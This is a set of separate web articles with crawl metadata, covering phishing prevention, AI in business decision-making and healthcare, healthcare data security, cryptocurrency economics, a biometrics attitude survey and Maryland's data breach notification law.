The more the Cyber threat landscape changes and diversifies, the more it holds the same. Still, in today’s date, there are some old tactics in the playbook of hackers that remain successful and most prevalent. In the year 2018, the wide majority of data leakage incidents were attempted by Cybercriminals external on the aimed enterprise. Unfortunately, major of these attacks were successfully attempted usually by activities performed by an internal business employee. Whether it be an unintentional mistake, a sudden accident, or clearly being mousetrapped by an attractive kind of proposal, human beings continue to fall victim to phishing attacks. Through this post, we want to aware readers of why hackers are still getting successful outcomes whenever they attempt phishing attacks on the targeted company. After this, one is going to read measures of preventing phishing attacks, which are not just to read but to implement as well! Are Human Beings Major Cause for Phishing Attacks? With the growth in the awareness about information security, business officials continue – albeit unknowingly – helping internet criminals to enter into the targeted systems. It is hard to accept but, it is a bitter truth that ‘humans are still the weakest link for each and every enterprise’s security architecture.’ As per the report given by Verizon data breach investigations 2018, the popular cause for the entire data breach incident was ‘accessing of stolen account credentials.’ Stolen passwords or compromised accounts data were blamed for 81% of attacking-associated data exposures in another latest company-wise Cybercrime survey. Another shocking fact in the same report was that these used credentials were collected via phishing attacks, or in situations where end-users downloaded different malware on their PC, unintentionally when they visited fraudulent websites. Don’t be disappointed, we have a solution to this problem! for preventing phishing attacks due to human errors, industries have to take the responsibility of training their employees and increase awareness regarding Cybersecurity. Although it is impossible to eliminate internet threats, they can be at least reduced up to a major extent. In today’s date, the reality is that a business employee from unknown geolocation makes a mistake on the public networks when he or she uses the enterprise’s resources online. This mistake is one point for which hackers look for attempting their intended threats. Earlier, phishing messages via email systems were easy to spot – they comprise misspelling, dangerous URLs, false alerts, or odd graphics. They were developed in a predominant manner to target the officials who have distracted, harried, irresponsible, or careless kind of nature. These kinds of persons don’t give a single thought before opening malicious emails and just access them without considering further consequences. Is There Any Change in Today’s Phishing Attacks? Nothing has been changed in the phishing attacks; only there is an update in them. The attempts to advance phishing rely on more sophisticated ideas, which are unpredictable. The availability of a huge amount of personal data on social media networks permits hackers to craft emails, which are customized with intention of exploiting user recipients’ unique vulnerabilities. There are chances that phishing attackers have perfectly copied the content and graphics from the authentic notification messages mailed by enterprises being spoofed. 
In fact, some emails might have a secretive code within them, which executes automatically when a person opens those emails. Not only business employees but, businesses are also vulnerable. It is so because industries fail in taking essential Cybersecurity measures that are needed to overcome cloud computing security risks. Though different researches have proven that security awareness training is an effective medium to reduce the overall data leakage risks in a company but, several enterprises do not have time or budget to deliver this education to their employees. In the upcoming section, we are going to suggest some measures for preventing phishing attacks. We request enterprises to implement approaches properly in their firm and at least tighten up the security from their end. Best Practices For Avoiding Phishing Attacks Here are some of the best practices that email client users should take to secure their network from phishing attacks and other kinds of social engineering-related threats. - Make Use of MFA – One of the best methods to protect network asset threats is multi-factor authentication. When this authentication method gets activated in a tenant, users have to ensure CSP that at least they have two unique tokens to access the business network. This feature is present as an in-built option in many of the popular email clients like Microsoft Office 365, Google cloud platform, etc. By enabling this feature, individuals validate their identity, before using the email account. - Enforce CASB Solution – As time passes away, preventing phishing attacks is getting tougher to achieve. Enterprises should begin use of a cloud access security broker (CASB) product in their premises, which sits in between the CSP and client’s on-premises architecture. The CASB solution acts like a gatekeeper, which enables industries to explore the reach of their cloud security standards beyond their own architecture. Don’t Let Phishing Attacks Take Over Your Business The wisest measures for preventing phishing attacks of your company from those that focus mainly on data monitoring and detection system. Nothing is impossible, the only thing is that businesses have to take the responsibility of securing their network infrastructure seriously. Rest, cloud computing is the best platform to grow and spread the business globally!
<urn:uuid:fb0f37b0-23f1-419a-a888-5f9972a4dbb5>
CC-MAIN-2022-40
https://www.cloudcodes.com/blog/preventing-phishing-attacks.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00421.warc.gz
en
0.94887
1,102
2.625
3
Listening to your gut will be much safer if you also listen to the machine crunching the data. Decision-making remains one of the ultimate tests for leadership in new entrepreneurs. Even experienced leaders who have a track record of sound decision-making have, at some point, made a drastically poor decision that shook their reputation. As the talk about AI promises a radical transformation of the organization, leaders are especially curious to know if it will make it easier for them. While a lot of them are excited, some of them don’t want decision-making made easier. Their ability to make sound decisions without complex technology is the very foundation of their reputation as good leaders. The good news is that AI is quite unlikely to make it easier for decision makers as they’ll be required to input judgment in the machine predictions. As the real impact remains to be seen, there are ways in which AI is set to inevitably affect business decision-making. Through data mining, many businesses are already using predictive analytics to make better decisions. Predictive analytics allows businesses to anticipate events by looking at a data set and trying to guess accurately what will happen at a certain time in the future. AI brings with it machine learning, another technique used in predictive analytics. The variation is that while data mining involves merely identifying patterns in large data sets, in machine learning, machines are not just designed to learn from the data, they are also built to react to it by themselves. With the information provided, decisions can be made on such issues as: - Which ads are served based on cost-effectiveness and potential ROI - How to optimize the buyer journey by analyzing consumer behavior - How to reduce customer churn - How achievable are the set goals Less decision fatigue Various psychological studies have shown that when we’re faced with many decisions to make within a short period of time, quality declines because we gradually deplete our mental energy. A case application of this is when supermarkets place candy and snacks at the cash register. Marketers know you’ll be making decisions throughout your short shopping trip and will be less likely to resist the sugar rush by the time you’re done. But you know who can resist the sugar? A machine. Algorithms, not prone to decision fatigue, can make an infinite number of decisions per day, each as accurate as possible. Executives who use AI will be at an advantage by using it to bypass human weakness. When making complex decisions, executives typically need to look at a set of different factors. Where there’s too much data to be considered, the decision-maker may get overwhelmed, leading to disastrous decisions. On the contrary, a machine can easily handle multiple inputs without exhaustion or confusion. All that’s needed is a set of instructions or programs that guide the machine to use probability and suggest or implement the most logical decision. […]
<urn:uuid:95dbfc83-cd50-4c6b-ac32-e97cc7304157>
CC-MAIN-2022-40
https://swisscognitive.ch/2018/08/18/artificial-intelligence-can-help-leaders-make-better-decisions-faster/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00421.warc.gz
en
0.950599
604
2.625
3
In 2017, there were more than 340 data breaches reported according to the breach tool of the U.S. Department of Health and Human Services. Increasingly, the healthcare industry becomes an easy target for hackers due to the significant value of patient data. There are different causes of data breaches in healthcare that could be a critical factor in data breaches, some of them are: - Human error - Physical theft Every health organizations must pay attention to those causes to further gain knowledge on how they will combat cyber attacks. Cyber criminals’ interest in healthcare data has been increasing due to sensitive and personal information from patients they could use to conduct crime. They could use a patient’s information, for example, to make a fake ID to use in buying drugs to be resold, this type of cyber crime is called identity theft. So, how do you secure your patient’s data despite the internet threats posed by cyber criminals today? Effective Ways to Secure Healthcare Data Medical data is not perishable so it’s more valuable than financial data. However, cyber criminals highly target biotech and pharmaceutical intellectual data nowadays. So if you’re in the healthcare industry, particularly keeping these kinds of data, make sure to double your security controls. Here are some proven ways to secure your healthcare data: - Identify sensitive information that needs utmost security. In order to secure your patient’s data, it’s important to consider automated data discovery of sensitive information. Usually, this is offered by security providers. It scans the network and identifies database servers and services that contain any sensitive information. - Monitor and assess database to find out vulnerabilities and misconfiguration. For healthcare organizations, it’s crucial to scan databases for potential weaknesses and risks to healthcare data. Once they are pinpointed, organizations can easily identify remediation strategies to prevent cybersecurity threats. - Check data usage regularly to monitor data access activities. Monitoring and auditing data usage activities is important such as applications and privileged user’s activity. In addition, it helps detect and alert your IT team when there’s an unauthorized access in your database. With regular monitoring, you can also determine what appropriate actions to take to block suspicious access. - Identify users that may pose threat to the database system. Some data security services provide machine learning in order to automatically reveal unusual data activities. It instantly profiles data and user activity to set up a baseline. Activities that will deviate from the baseline is automatically identified as threat to prevent a cybersecurity attack. - HIPAA compliance, or Health Insurance Portability and Accountability Act of 1996 Compliance guarantees patients’ that their sensitive and personal information is well secured. HIPAA established industry-wide standards in which all electronic health care transactions must be kept confidential, it also limits the ability of healthcare providers to use or disclose patients’ data information for any type of use unrelated in providing healthcare. Complying with HIPAA should be a priority for every health organization looking to avoid facing penalties once a data breach occurs. Coordinating with companies that offer excellent HIPAA compliance courses will result in a solid knowledge about how HIPAA works and how to best avoid liability scenarios. 
- Keep sensitive data unexposed and provide layered security to stop hackers from accessing any healthcare information. Masking all your sensitive data helps reduce data breach risks and is also a standard measure for complying with data privacy regulations. Integrate bespoke data transformers into your system so that data remains usable without exposing sensitive details such as electronic medical records and electronic health records.
The costs and risks of cybersecurity breaches involving healthcare data are significantly high, so healthcare organizations must invest in protecting that data to prevent cyber attacks. With how quickly the threat landscape changes, you must stay vigilant against every kind of threat. Always make sure that your database is safe and secure from the hackers and fraudsters who could cost you millions of dollars.
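To make the masking idea above a little more concrete, here is a minimal Python sketch. It is not tied to any particular product; the record fields, the salt, and the masked_patient helper are all invented for illustration, and a real deployment would need a secret salt and a vetted masking policy.

import hashlib

# Hypothetical patient record; field names are illustrative only.
patient = {
    "name": "Jane Doe",
    "ssn": "123-45-6789",
    "diagnosis_code": "E11.9",   # clinical fields stay usable for analytics
    "visit_year": 2018,
}

def pseudonymize(value: str, salt: str = "demo-salt") -> str:
    """Replace an identifier with a stable, non-reversible token."""
    return hashlib.sha256((salt + value).encode()).hexdigest()[:12]

def masked_patient(record: dict) -> dict:
    """Return a copy with direct identifiers masked and other fields untouched."""
    masked = dict(record)
    masked["name"] = pseudonymize(record["name"])
    masked["ssn"] = "***-**-" + record["ssn"][-4:]   # partial masking keeps only the last four digits
    return masked

print(masked_patient(patient))

The point is simply that analysts and test systems can work with the masked copy while the identifying values never leave the protected environment.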
<urn:uuid:b6b85a3b-525a-46c5-a29e-ebeb9e21d92b>
CC-MAIN-2022-40
https://www.404techsupport.com/2018/09/17/securing-healthcare-data/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00421.warc.gz
en
0.917595
808
2.671875
3
Cryptocurrencies have been at the center stage of fintech-related developments for the last couple of years. They have brought about a lot of interest from the general public in the field of cryptography. Reputed universities like Princeton are now offering dedicated courses in mastering blockchains. The modern crypto revolution did not start overnight though. Here we analyze the rationale behind using cryptocurrencies (with a historical perspective), the need behind a global value of store, and the rising demand in this field. For a token to be called “money”, it must satisfy certain requirements; it should be portable, durable, recognizable, scarce, and it should be divisible into proper smaller denominations. Cryptocurrencies fulfill these requirements, and even more. For example, Bitcoin is divisible into 10^8 base units called Satoshis, it can be stored electronically, and it does not atrophy or decay. Moreover, it is backed by proof of work, which ensures its scarcity. In fact the total number of bitcoins to be injected in the market (provided to the miners) over the next few decades has already been estimated very accurately and is capped at 21 million BTC. The idea of cryptocurrencies resonates very well with the idea of “Ideal money” put forward by John Nash in his famous 2002 paper by the same name. In the paper, Nash describes a value of store that can adjust the industrial consumption price index (ICPI) depending upon how the patterns of international trade evolve. For a currency to be called Ideal money, it must be suitable as a value of store that is widely acceptable even outside national boundaries. This is important for people who do not have faith in their own country’s currency, or want to diversify their holdings. Bitcoin paralleled this definition during the severe financial crisis in Cyprus in 2013 when people lost faith in their banking system and started buying BTC, which in turn made the prices soar. Same thing happened again in 2015 during the peak of the Greek financial crisis. Cryptocurrencies potentially have a huge role to play in international trade as well. As the field progresses and new platforms emerge, we finally might get a viable solution to the Triffin dilemma. This paradox arises because of conflict of interest for a country whose currency is used as a global reserve. The gold based standard established in 1944 during the Bretton Woods conference has already been found to be unstable, with United States exiting the pact in an event known as the Nixon shock. The earliest attempt for a neutral solution was that of Bancor, which could not materialize at that time. Cryptocurrencies operate with an assumption of zero trust between the transacting parties, and are not under the control of a single command point. This makes them an ideal replacement for the current system of IMF Special Drawing Rights (SDR). While Bitcoin (and other cryptocurrencies) have characteristics that make them “ideal,” there are several problems that come with them too. All the transactions are irreversible, which means that a faulty payment cannot be undone. Money flows in one direction only. In some systems like Ethereum, it is sometimes possible to execute an inverse transaction, although that depends upon how the contract has been built. An unsolved problem with cryptocurrencies is of linking online identities with real world identities. 
Different cryptocurrencies take different stands on this issue, depending upon how much tradeoff they can have between the consumer’s privacy and the convenience of doing the transaction (Bitcoin is semi-anonymous). Another “theoretical” concern with a world governed using cryptocurrencies is that nearly all of them are deflationary in nature. This is where two schools of thoughts collide, but a clear majority of economists believe that deflationary economies are not sustainable. Although not of major concern at the present (and probably the reason why it is not discussed enough), currencies like BTC do have a problem with falling into a deflationary spiral. There is no doubt that cryptocurrencies are here to stay, and will grow in market size substantially over the coming years. Various new cryptocurrencies are coming out these days, each doing something differently than the others. Apart from cryptocurrencies like BTC, Dogecoin, and Litecoin, some platforms have also emerged, most notably the Ethereum project. Some new promising cryptocurrencies like trade.io are exploring the field of combining utility tokens with an exchange platform, as detailed in this Trade IO whitepaper. A decentralized blockchain exchange naturally promotes high liquidity because the level of accessibility is much lower than it has been traditionally. Almost anyone can trade any asset, regardless of which currency they’re using or where they’re from – a truly free market. There is no waiting for verification from banks, gathering documents, enduring lengthy registration periods, or fear of unsafe data storage. Moreover, there are few fees because there is little overhead. Apart from cryptocurrencies, the underlying blockchains have also captured people’s imagination lately. Various startups have come up that apply the blockchain technology to solve problems of distributed nature that require consensus among the involved parties. Tech giants like Walmart are using blockchains for supply chain management, while big banks are using it to reimagine their money flow pipeline and for near realtime transactions. This space is surely going to see a lot of development in the coming years.
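As an aside to the 21 million BTC cap mentioned earlier in this piece: the cap is not a promise but falls out of the issuance arithmetic, since the block subsidy started at 50 BTC and halves every 210,000 blocks until it rounds down to zero. The short Python sketch below reproduces that arithmetic; the two constants are the protocol's published parameters, and everything else is just illustration.

# Approximate Bitcoin's maximum supply from its halving schedule.
SATOSHIS_PER_BTC = 100_000_000       # 10^8 base units (satoshis) per coin
BLOCKS_PER_HALVING = 210_000         # the subsidy halves every 210,000 blocks

total_sat = 0
subsidy = 50 * SATOSHIS_PER_BTC      # initial block reward, in satoshis
while subsidy > 0:
    total_sat += BLOCKS_PER_HALVING * subsidy
    subsidy //= 2                    # integer halving eventually reaches zero

print(total_sat / SATOSHIS_PER_BTC)  # just under 21 million BTC

Summing the series this way lands slightly below 21,000,000 exactly because the subsidy is halved in whole satoshis.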
<urn:uuid:4e91999f-1cf4-4693-a7cc-2272147e4a8a>
CC-MAIN-2022-40
https://www.cio.com/article/227996/the-rationale-behind-cryptocurrencies.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00421.warc.gz
en
0.958621
1,071
2.75
3
Artificial Intelligence in Healthcare and Beyond: Year-in-Review and What to Expect in 2019 Updated: Oct 24, 2020 “We always overestimate the change that will occur in the next two years and underestimate the change that will occur in the next 10.” Bill Gates When it comes to Artificial Intelligence (AI), it is hard to overestimate the amount of change that is already or nearly upon us. AI is ushering in the new era of transformation and rapid growth across every industry. Claims range from futuristic predictions that AI will make absolutely everything in our lives easier to fear-inducing proclamations that AI will take away millions of jobs and lead to ruin. Let’s dive into the current state of this technology and separate fact from fiction. A (Very) Brief History of AI The term Artificial Intelligence was first coined in the late 1950s. This technology makes it possible for computers and machines to recognize patterns in and learn from data and experience to automate variety of tasks across industries, delivering business benefits. The hallmark of AI is that it can learn autonomously -- in other words, on its own. But AI relies heavily on related technologies of Machine Learning (ML), Deep Learning (DL) and Natural Language Processing (NLP). What is interesting about AI, and perhaps a reflection of evolving nature of this technology, is that the scope of Artificial Intelligence keeps shifting. For example, optical character recognition used to be considered AI, but now that it has become ubiquitous and routine, it’s no longer under the AI umbrella. In 1980, it was said that “AI is whatever hasn’t been done yet.” Many definitions of AI exist, with most of them converging on “Artificial” and differing slightly on “Intelligence”. There are also several terms that are often used interchangeably with AI, for example Machine Learning. Rise of AI in Healthcare Artificial Intelligence is increasingly considered the “nervous system” of healthcare and the engine for its growth. Frost & Sullivan estimates that AI health market will reach $6.6 billion by 2021, a compound annual growth rate of 40 percent. In just the next five years, the health AI market will grow more than 10x. AI in health is a constellation of technologies that enable machines to repeatedly sense their environment, understand the data, decide on and execute actions and learn from them in a virtuous circle. Unlike current and legacy technologies that exist to complement humans, the AI today is able to augment human activity. AI in healthcare can already perform administrative functions and is increasingly used in clinical applications. According to a recent analysis from Accenture, key clinical health AI applications combined can potentially create $150 billion in annual savings for the US healthcare economy by 2026. Accenture analysed the top 10 AI applications including dosage error reduction, clinical trial matching and image diagnosis. They identified the following top three AI applications with the greatest near-term value to the health economy and likelihood of adoption: robot-assisted surgery ($40 billion) virtual nursing assistants ($20 billion) administrative workflow assistance ($18 billion) [See the chart below and another graphical representation of this data] Drivers of AI in Clinical Applications Artificial Intelligence is poised to influence and enable significant breakthroughs in nearly every aspect of the human condition. 
In clinical applications, the promise of this technology is to provide a set of tools to augment the capabilities of health systems and providers, improving their effectiveness and liberating physicians from mundane tasks so they can focus on the human side of medicine. The convergence of internal and external pressures and new opportunities are driving the need for more sophisticated technologies and tools: The onslaught of data. In clinical setting in particular, data-rich technologies such as whole-genome sequencing and mobile device biometrics require physicians to interpret and analyse vast amounts of data from disparate streams. Recent healthcare mandates are mounting pressure on providers and health systems to focus on value based care and provide greater operational efficiency. The rise of consumerism in healthcare. Patients are beginning to demand better and more personalized care. As a result, physicians are being inundated with data requiring more sophisticated interpretation while being expected to perform more efficiently. The solutions are Artificial Intelligence and Machine Learning, which can enhance every stage of patient care, from research and discovery to diagnosis to selection of therapy to monitoring of treatment progress. Therefore, clinical practice will become more efficient, more convenient, more personalized, and more effective. In the future, the data will not be collected solely within the health care setting though. The rise of the Internet of Things (IoT) and proliferation of mobile sensors will allow physicians of the future to monitor, interpret, and respond to additional streams of biomedical data collected remotely and automatically. AI in Other Industries Finance & Banking From bots to sales automation, Artificial Intelligence is helping global brands learn more about their customers to enhance personalization and drive sales. In fact, Gartner says that “by 2020, 85 percent of customer interactions will be managed without a human”. Most enterprise app developers must rely on a variety of legacy data sources making it a challenge to deliver real-time insights. Hence the value of new tools for rapidly developing and deploying important new financial applications and a need for reliable, unified platforms spanning data management, interoperability, transaction processing, and analytics. Organizations are already beginning to use AI to bolster cybersecurity and offer more protections against sophisticated hackers. AI helps by automating complex processes for detecting attacks and reacting to data breaches. According to ESG research, 12 percent of enterprise organizations have already deployed AI-based security analytics extensively, and 27 percent have deployed AI-based security analytics on a limited basis. With the rate of data breaches increasing, machine based security approaches are desperately needed to augment human security analysts. Supply Chain & Logistics AI can help employees find the right information they need faster, enabling them to log information more efficiently and streamline customer operations. The most clear use case for AI in this arena is harnessing the data from the supply chain, analyzing it, identifying patterns, and delivering insights for supply chain managers. In logistics, AI enables predictive analytics, forecasting demand, optimizing routes and handling network management. DHL for example has developed a tool to predict air freight transit time delays in order to enable proactive mitigation. 
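None of the vendors mentioned above publish their models, so the following is only a generic sketch of the simplest kind of demand forecasting alluded to in the logistics paragraph: exponential smoothing over a short history of weekly order counts. The sample data and the smoothing factor are fabricated for illustration.

def exponential_smoothing(history, alpha=0.3):
    """Return a one-step-ahead forecast from past demand observations."""
    if not history:
        raise ValueError("need at least one observation")
    forecast = history[0]
    for observed in history[1:]:
        # blend the newest observation with the running forecast
        forecast = alpha * observed + (1 - alpha) * forecast
    return forecast

weekly_orders = [120, 135, 128, 150, 160, 155, 170]    # made-up sample data
print(round(exponential_smoothing(weekly_orders), 1))  # next-week estimate

Production systems would add seasonality, trend, and external signals, but the basic idea of learning a forecast from past observations is the same.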
Artificial Intelligence has become Pentagon’s priority. Beyond robotics for military applications, agencies at the federal level are beginning to deploy AI-based interfaces for customer interactions, to enhance compliance, reduce fraud and deliver personalized services. A recent Accenture survey shows that 40 percent of taxpayers reported making a filing error in the last 24 months, with nearly 70 percent of taxpayers saying that they would use AI to improve the results. Given the scale and scope of data across agencies, the Artificial Intelligence opportunities are almost endless. Highlights from 2018: Artificial Intelligence in Action In October 2018, we participated in the InterSystems Global Summit and its inaugural AI Symposium. The Summit was held in San Antonio, Texas. Attendees got an extensive overview of the current landscape and present and future capabilities of Artificial Intelligence. From superb keynotes to experiential workshops, the breadth of current applications of AI on display was mind blowing. Here are the 3 examples that caught our attention in particular. The amazing Rosalind Picard kicked off the AI Symposium by sharing touching stories that led her to discover several phenomena, including stress as a predictor of convulsive seizures. Rosalind is founder and director of the Affective Computing research group at the MIT Media Lab. She also co-founded two companies: Empatica, which creates wearable sensors and analytics to improve health, and Affectiva, which delivers technology to help measure and communicate emotion. Rosalind coined the term Affective Computing, sometimes referred to as Artificial Emotional Intelligence, or Emotion AI. This fascinating interdisciplinary field includes devices and systems that recognize, interpret, process and simulate human emotions or other affective phenomena. Emotion is fundamental to human experience. And with evolving Affective Computing technology, we can better understand the ways emotions impact health, learning, memory, behavior and social interaction. We can advance wellbeing by using new ways to communicate, understand, and respond to emotion. Some of the examples of ongoing efforts include ways to help people with special needs to overcome challenges they face with motivation, communication and emotion regulation and improving human experiences by enabling computers, wearables and robots to receive natural emotional feedback. Another area of advancement is new ways to forecast and prevent depression ahead of any visible signs by using a combination of smartphones, wearables and Machine Learning. Rosalind also discovered a surprising strong connection between the brain and the skin that she has been exploring to predict and prevent major adverse health events. More broadly, the Affective Computing technology coupled with Machine Learning analytics and Artificial Intelligence have a potential to significantly improve people's’ lives, with applications in “autism, epilepsy, depression, PTSD, sleep, stress, dementia, autonomic nervous system disorders, human and machine learning, health behavior change, market research, customer service, and human-computer interaction.” To continue with the theme of Artificial Intelligence, but showing its applications in human creativity, we heard from the brilliant Gil Weinberg. His keynote was about the jazz playing robot, Shimon, who uses algorithms and analytical thinking to give rise to new forms of creativity. 
With his improvising robotic musicians such as Shimon, Gil has traveled the world, featuring this technology at the dozens of concerts and presentations in festivals and conferences such as SIGGRAPH, DLD and the World Economic Forum in Davos. “Most of what Shimon is playing is generated using a new process where he creates hundreds of melodies offline based on deep learning analysis of large musical data sets,” said Gil. “Then us humans (me and my students) choose melodies we like and orchestrate/structure them into songs. It’s a new form of robot-human collaboration.” “We are now ready to move to the next frontier of real time collaborative improvisation – freestyle rapping, where the hope is that the rapper will be influenced by what Shimon is coming up with and vice versa.” Gil’s newest invention is Travis (also known as Shimi), a smartphone-enabled AI robotic musical companion that is designed to enhance listener’s musical experiences. We left with the clear impression how creative robots can help humans to unlock their own creative potential. AI Through the Years and the Eras Babak Hodjat, dubbed the “inventor of Siri”, delivered the closing keynote of the AI Symposium in a spectacular outdoor setting. Babak took us on a journey through the Artificial Intelligence’s past, present and future. Babak is the inventor of the NLP-based technology currently used in Apple’s Siri. Now he is the CEO and co-founder of Sentient Technologies, the company that “created the world’s most powerful distributed AI platform”. Babak shared the evolution of technologies that used to be called Artificial Intelligence, but now are just commonplace tools. "Our tools are what define us as humans and allow us to change the world”. But while humans strive to develop new tools and invent technologies that change our experience and the world, Babak’s view of Artificial Intelligence is not without scepticism: “AI has over-promised and under-delivered. This is because there is a deep chasm between popular notions of AI, rooted in science fiction, and the reality of the state of AI. I think we need to educate people so that society’s reaction to AI is proportionate to the reality of where it is and its promise, rather than disproportionate to the perceived threat of Science Fiction AI.” Surrounded by the beauty of the setting sun in Texas, Babak shared an impressive and thought provoking panoply of what’s next for AI, including the dawn of artificial humans. He explored the themes discussed earlier in the day by Rosalind Picard, including Affective Machine Learning. “Emotions are fundamental to human memory, and memory is not about the past, it is about the future”. Looking to 2019 and Beyond Stephen Hawking said that Artificial Intelligence could be “the biggest event in the history of our civilization.” We are already seeing the tremendous inroads that AI has made in virtually every industry, from Agriculture and Finance to Manufacturing and Energy to Healthcare and Pharmaceuticals. Despite AI’s rapid expansion, the Artificial Intelligence technology itself is still evolving. AI points towards a future where machines not only do physical work, as they have done since the industrial revolution, but also the “thinking” work – planning, strategizing, prioritizing and making decisions. From Narrow AI to General AI to Superintelligence and beyond. In fact, the definition of what is considered Artificial Intelligence keeps shifting. 
What used to be called AI even several years ago is now just widely used and familiar technology, and no longer resides under the AI umbrella. It might be the only field of technology where its definition and scope change as technology gets adopted. Artificial Intelligence can already sense, think and act. AI can hear, see and speak through Natural Language Processing, speech recognition and Machine Vision. It can understand, perceive and assist via Machine Learning, Deep Learning and planning and scheduling. And AI can act in physical, cognitive and creative ways through robotic process automation, machine translation and adaptive systems. We are already experiencing many of these powerful abilities on a daily basis, perhaps even without knowing it, as AI is integrated into our everyday applications. Processing Big Data might have been a hallmark of AI in 2015. By contrast, 2018 was the year of using tools, algorithms and platforms for Machine Learning to find adaptive solutions to complex problems. AI is ready to automate increasingly complex processes today, identify trends to create business value, and provide forward-looking intelligence. McKinsey study reports that advances in AI, machine learning and robotics “herald a new era of breakthrough innovation and opportunity”, pushing the frontier “in all facets of business and the economy.” In 2019, we will see smart, predictive technology being rolled out across a wide range of business operations and industries. Yet to us, the most fascinating thing about AI is that it can make people superhuman and at the same time, help us be just more ... human. The future is not “Humans vs AI” but rather “Humans + AI”. And we are excited about what that future brings! For more Artificial Intelligence Predictions for 2019, see our guest post on theInterSystems’ Data Matters blog. About the Authors Evan Kirstel is an internationally recognized thought leader, top technology influencer and B2B marketer. With a social media following of more than 400K and organic reach in the millions, Evan is helping brands achieve massive visibility and scale across the social media landscape in areas like mobile, blockchain, cloud, 5G, Health Tech, IoT, AI, Digital Health, crypto, AR, VR, Big Data, Analytics and Cyber Security. Evan was recently named 4th Most Engaging Digital Marketer by Brand24. LinkedIn & Twitter: @EvanKirstel Irma Rastegayeva is a Consultant and Coach at the intersection of health, technology, humanity and storytelling. Following 20+ year career in product development, consulting and management, Irma combines deep technical expertise with patient advocacy and community engagement at eViRa.Health. Named in the Top 30 Women in Tech, Irma is recognized as a top influencer in DigitalHealth, HealthTech and IoT. Irma serves on the board of the American College of Healthcare Trustees. LinkedIn & Twitter: @IrmaRaste
<urn:uuid:dd9288ba-bd81-4d41-8b3c-1f2d45a9c2b6>
CC-MAIN-2022-40
https://www.evirahealthtechstrategies.com/post/artificial-intelligence-in-healthcare-and-beyond-2019
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00421.warc.gz
en
0.935279
3,288
2.53125
3
A new study finds that the public is warming up to the use of biometric identification technology, but remains wary of tracking applications and is looking to government to set standards in that area. After surveying 1000 people, the Center for Identity at the University of Texas (CID) said on May 10 it found that people are relatively comfortable with the technology. About 68 percent of people were at least somewhat comfortable with providing biometric data to an organization, although comfort level varied by the type of data provided. People feel most comfortable with fingerprint scans, and 58 percent of respondents were very comfortable providing them, the survey said. The study found that government tracking was a major concern for 24 percent of those who were uncomfortable with biometrics, the second most cited reason of concern behind general privacy issues. Governments will have to work to alleviate those fears, as biometrics presents a range of opportunities for deployment going forward, CID said. Facial scans are an area that especially concerned survey respondents–35 percent rated facial recognition as the method they were least comfortable with, and 13 percent said they were not at all comfortable providing facial scans. “This could be influenced by the… negative media coverage relating to the use of facial recognition software for tracking and surveillance purposes,” said CID’s Rachel German and Suzanne Barber, the authors of the report. They said respondents were more comfortable providing biometric data about their children to law enforcement, rather than to private sector firms. Survey results showed that people are looking to government agencies to set the standards for use of biometrics data, as 64 percent think that it’s likely government will set effective safeguards for individual privacy. Eighty-two percent think it’s at least somewhat likely that all Americans will have a biometric ID on file by 2020, the survey found.
<urn:uuid:809941d4-e22d-4797-900a-fe0017fa5d2f>
CC-MAIN-2022-40
https://origin.meritalk.com/articles/study-public-embraces-biometrics-with-reservations/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00421.warc.gz
en
0.973233
377
2.515625
3
An Overview of the Maryland Personal Information Protection Act
The Maryland Personal Information Protection Act (PIPA) is a privacy law aimed at protecting the privacy of the residents of the State of Maryland. Although Maryland's privacy laws are not as comprehensive as California's consumer privacy laws, they do aim to address public concern over the way data is protected. Businesses serving Maryland residents must be aware of these consumer privacy laws and take steps to achieve compliance; failure to do so can lead to severe financial penalties. Here's what you need to know about Maryland privacy laws.
What is the Maryland Personal Information Protection Act (PIPA)?
The Maryland Personal Information Protection Act came into effect in January 2008. Also known as the Maryland Data Breach Notification Law, it has been regularly amended in response to the growing number of data breaches in which consumer data has been lost, stolen, or sold without authorization. It details how businesses collect, use, and disclose data, as well as the rights of consumers with regard to their personal data.
What is Personal Information?
Maryland data privacy laws specifically define what counts as personal information. This includes a Maryland resident's first and last names or their initials, in combination with one or more of the following:
· Official ID numbers, such as Social Security, passport, driver's license, or tax identification numbers.
· Financial numbers, such as account, credit card, or debit card numbers.
· Personal health information, such as details of health insurance policies.
· Biometric data.
If a business already complies with federal data protection laws or the more extensive consumer privacy laws of a state like California, the Maryland authorities will consider the business to be in compliance. The chances are your business already complies with Maryland data privacy laws. The majority of compliance consists of implementing a reasonable level of security to protect personal information. This requires creating, adopting, and maintaining a written security policy. It also requires businesses to take reasonable steps to prevent unauthorized access to personal information.
Notification of Security Breach
The Maryland data breach notification requirements are the main obligations businesses have when handling the personal information of Maryland residents. If there is a security breach, businesses are required to inform affected consumers within 45 days of the breach, and the business must also conduct a prompt investigation into the breach. Notices must be made to consumers in writing unless more than 175,000 people are affected, in which case a post on the website or notice via email is acceptable. Any notice must urge the consumer to change their passwords and security questions. A security breach notification must detail all compromised information, provide the business's contact information, and provide a statement that informs consumers how they can get advice on preventing identity theft via the FTC and OAG. It also must include the following third-party addresses and toll-free numbers:
· TransUnion, Experian, and Equifax (the main credit reporting agencies).
· The Maryland Office of the Attorney General (OAG).
· The Federal Trade Commission (FTC).
Amendments were made to the Maryland data privacy laws in 2019 to expand the mandate of PIPA.
